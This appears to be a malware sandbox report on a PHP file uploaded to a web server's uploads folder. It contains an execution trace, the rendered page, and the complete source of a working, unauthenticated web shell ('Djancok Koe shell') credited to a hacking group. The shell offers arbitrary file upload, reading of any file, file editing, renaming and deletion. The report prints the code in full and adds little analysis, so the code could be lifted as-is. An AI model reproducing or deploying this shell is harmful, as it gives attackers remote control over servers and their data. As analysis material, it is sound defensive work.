2 24 0 0.001777 444400 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/..'
2 24 1 0.001791 444448
2 24 R FALSE
2 25 0 0.001804 444408 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001819 444448
2 25 R TRUE
2 26 0 0.001833 444408 filesize 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001846 444448
2 26 R 64
1 A /var/www/html/uploads/9321.phtml 62 $size = 0.0625
2 27 0 0.001870 444352 round 0 /var/www/html/uploads/9321.phtml 63 2 0.0625 3
2 27 1 0.001885 444424
2 27 R 0.063
1 A /var/www/html/uploads/9321.phtml 63 $size = 0.063
1 A /var/www/html/uploads/9321.phtml 63 $size = '0.063 KB'
2 28 0 0.001923 444448 is_writable 0 /var/www/html/uploads/9321.phtml 65 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001941 444488
2 28 R FALSE
2 29 0 0.001954 444448 is_readable 0 /var/www/html/uploads/9321.phtml 66 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001969 444488
2 29 R TRUE
2 30 0 0.001983 444448 perms 1 /var/www/html/uploads/9321.phtml 67 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001996 444448 fileperms 0 /var/www/html/uploads/9321.phtml 72 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.002009 444488
3 31 R 33188
2 A /var/www/html/uploads/9321.phtml 72 $perms = 33188
2 A /var/www/html/uploads/9321.phtml 72 $info = '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 30 1 0.002124 444488
2 30 R '-rw-r--r--'
2 32 0 0.002138 444448 is_writable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.002153 444488
2 32 R FALSE
2 33 0 0.002166 444448 is_readable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002181 444488
2 33 R TRUE
2 34 0 0.002194 444448 filemtime 0 /var/www/html/uploads/9321.phtml 69 1 '/var/www/html/uploads/.htaccess'
2 34 1 0.002206 444488
2 34 R 1676251895
2 35 0 0.002219 444392 date 0 /var/www/html/uploads/9321.phtml 69 2 'd-M-Y H:i' 1676251895
2 35 1 0.002251 444720
2 35 R '12-Feb-2023 20:31'
2 36 0 0.002267 444456 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/9321.phtml'
2 36 1 0.002281 444504
2 36 R TRUE
2 37 0 0.002295 444464 filesize 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/9321.phtml'
2 37 1 0.002306 444504
2 37 R 7810
1 A /var/www/html/uploads/9321.phtml 62 $size = 7.626953125
2 38 0 0.002330 444360 round 0 /var/www/html/uploads/9321.phtml 63 2 7.626953125 3
2 38 1 0.002343 444432
2 38 R 7.627
1 A /var/www/html/uploads/9321.phtml 63 $size = 7.627
1 A /var/www/html/uploads/9321.phtml 63 $size = '7.627 KB'
2 39 0 0.002387 444464 is_writable 0 /var/www/html/uploads/9321.phtml 65 1 '/var/www/html/uploads/9321.phtml'
2 39 1 0.002402 444504
2 39 R FALSE
2 40 0 0.002415 444464 is_readable 0 /var/www/html/uploads/9321.phtml 66 1 '/var/www/html/uploads/9321.phtml'
2 40 1 0.002429 444504
2 40 R TRUE
2 41 0 0.002442 444464 perms 1 /var/www/html/uploads/9321.phtml 67 1 '/var/www/html/uploads/9321.phtml'
3 42 0 0.002454 444464 fileperms 0 /var/www/html/uploads/9321.phtml 72 1 '/var/www/html/uploads/9321.phtml'
3 42 1 0.002466 444504
3 42 R 33204
2 A /var/www/html/uploads/9321.phtml 72 $perms = 33204
2 A /var/www/html/uploads/9321.phtml 72 $info = '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 41 1 0.002580 444504
2 41 R '-rw-rw-r--'
2 43 0 0.002594 444464 is_writable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/9321.phtml'
2 43 1 0.002608 444504
2 43 R FALSE
2 44 0 0.002621 444464 is_readable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/9321.phtml'
2 44 1 0.002635 444504
2 44 R TRUE
2 45 0 0.002648 444464 filemtime 0 /var/www/html/uploads/9321.phtml 69 1 '/var/www/html/uploads/9321.phtml'
2 45 1 0.002660 444504
2 45 R 1676251895
2 46 0 0.002673 444400 date 0 /var/www/html/uploads/9321.phtml 69 2 'd-M-Y H:i' 1676251895
2 46 1 0.002704 444728
2 46 R '12-Feb-2023 20:31'
2 47 0 0.002719 444456 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/data'
2 47 1 0.002734 444488
2 47 R FALSE
2 48 0 0.002747 444456 is_file 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002762 444504
2 48 R TRUE
2 49 0 0.002775 444464 filesize 0 /var/www/html/uploads/9321.phtml 62 1 '/var/www/html/uploads/prepend.php'
2 49 1 0.002788 444504
2 49 R 57
1 A /var/www/html/uploads/9321.phtml 62 $size = 0.0556640625
2 50 0 0.002811 444360 round 0 /var/www/html/uploads/9321.phtml 63 2 0.0556640625 3
2 50 1 0.002824 444432
2 50 R 0.056
1 A /var/www/html/uploads/9321.phtml 63 $size = 0.056
1 A /var/www/html/uploads/9321.phtml 63 $size = '0.056 KB'
2 51 0 0.002860 444464 is_writable 0 /var/www/html/uploads/9321.phtml 65 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002875 444504
2 51 R FALSE
2 52 0 0.002888 444464 is_readable 0 /var/www/html/uploads/9321.phtml 66 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002903 444504
2 52 R TRUE
2 53 0 0.002916 444464 perms 1 /var/www/html/uploads/9321.phtml 67 1 '/var/www/html/uploads/prepend.php'
3 54 0 0.002929 444464 fileperms 0 /var/www/html/uploads/9321.phtml 72 1 '/var/www/html/uploads/prepend.php'
3 54 1 0.002942 444504
3 54 R 33261
2 A /var/www/html/uploads/9321.phtml 72 $perms = 33261
2 A /var/www/html/uploads/9321.phtml 72 $info = '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'w'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'r'
2 A /var/www/html/uploads/9321.phtml 72 $info .= '-'
2 A /var/www/html/uploads/9321.phtml 72 $info .= 'x'
2 53 1 0.003056 444504
2 53 R '-rwxr-xr-x'
2 55 0 0.003070 444464 is_writable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/prepend.php'
2 55 1 0.003085 444504
2 55 R FALSE
2 56 0 0.003098 444464 is_readable 0 /var/www/html/uploads/9321.phtml 68 1 '/var/www/html/uploads/prepend.php'
2 56 1 0.003112 444504
2 56 R TRUE
2 57 0 0.003125 444464 filemtime 0 /var/www/html/uploads/9321.phtml 69 1 '/var/www/html/uploads/prepend.php'
2 57 1 0.003142 444504
2 57 R 1676251895
2 58 0 0.003155 444400 date 0 /var/www/html/uploads/9321.phtml 69 2 'd-M-Y H:i' 1676251895
2 58 1 0.003186 444728
2 58 R '12-Feb-2023 20:31'
1 3 1 0.003212 444512
0.003251 326176
TRACE END [2023-02-12 23:32:01.753424]
Generated HTML code
<html><head><link href="" rel="stylesheet" type="text/css"><title>Kontol Njepat </title>
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <div style="color:#ef6c00;margin-top:0;"><h1><center>Indramayu IT Comunity</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;">
<input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/321.phtml&path=/var/www/html">321.phtml</a></td><td><center>7.627 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 19:45</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="321.phtml"><input type="hidden" name="path" value="/var/www/html/321.phtml"><input type="submit" value="+"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 19:45</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value="+"></form></center></td></tr></tbody></table></div><br><center>Djancok Koe shell <a href="http://web-not404foundcyberteam.gq">Recoded by dedidarmadi678</a>.</center><br></body></html>Original PHP code
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}
?>
<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>Kontol Njepat </title>
<link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <?php echo'<div style="color:#ef6c00;margin-top:0;"><h1><center>Indramayu IT Comunity</center></h1></div>';
if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();}
$path = str_replace("\\","/",$path);$paths = explode("/", $path);
echo '<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>';echo "<font style='font-size:13px;'>Path: ";
foreach($paths as $id => $pat) {echo "<a style='font-size:13px;' href='?path=";
for($i = 0; $i <= $id; $i++) {echo $paths[$i];
if($i != $id) {echo "/";} }echo "'>$pat</a>/";}
echo '<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>
<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<center><font color="#00ff00">Upload succes:)</font></center><br/>';}
else{echo '<center><font color="red">Upload Failed:(</font></center><br/>';}}
echo '</td></tr><tr><td></table>';
if(isset($_GET['filesrc'])){
echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: ';echo "".basename($_GET['filesrc']);"";echo '</tr></td></table><br />';echo("<center><textarea readonly=''>".htmlspecialchars(file_get_contents($_GET['filesrc']))."</textarea></center>");}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<center><font color="#00ff00">Rename OK!</font></center><br />';
}else{
echo '<center><font color="red">Rename Failed!</font></center><br />';
} $_POST['name'] = $_POST['newname'];}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '<center><font color="#00ff00">Edit File OK!.</font></center><br />';
}else{echo '<center><font color="red">Edit File Failed!.</font></center><br />';}fclose($fp);}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /><input type="hidden" name="path" value="'.$_POST['path'].'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>';}echo '</center>';}else{echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<center><font color="#00ff00">Dir Deleted!</font></center><br />';
}else{echo '<center><font color="red">Delete Dir Failed!</font></center><br />';}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){echo '<font color="#00ff00">Delete File Done.</font><br />';}else{
echo '<font color="red">Delete File Error.</font><br />';}}}echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>';
foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr><td>[D] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>";
if(is_writable("$path/$dir")) echo '<font color="#00ff00">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
echo"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";}
foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;
$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';}
echo "<tr><td>[F] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>".$size."</center></td><td><center>";
if(is_writable("$path/$file")) echo '<font color="#00ff00">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";}
echo '</table></div>';}echo '</body></html>';
function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;}
echo'<br><center>Djancok Koe shell <a href="http://web-not404foundcyberteam.gq">Recoded by dedidarmadi678</a>.</center><br>';?>